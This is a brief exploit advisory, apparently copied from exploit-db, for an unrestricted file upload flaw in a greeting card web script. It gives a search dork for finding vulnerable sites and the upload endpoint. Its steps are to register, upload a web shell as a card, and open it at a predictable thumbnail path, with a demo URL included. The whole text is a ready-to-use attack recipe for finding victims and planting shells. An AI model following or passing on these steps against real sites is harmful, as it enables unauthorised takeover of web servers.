greeting card 远程上传漏洞
[+]info:
~~~~~~~~~
# Date: [04/06/2010]
# Author: [Mr.Benladen]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : MaFiadu48@hotmail.fr

[+]poc:
~~~~~~~~~
[Dork ]: "Send amazing greetings to your friends and relative!"

{exploit} : http://127.0.0.1/upload.php

First register and the site and go to upload cards

After you have uploaded your shells , you will find it in this Path :
http://[site]//cards/id_thumb_evil.php

demo : http://server/cards/1275663706_thumb_oujda.php

[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/13751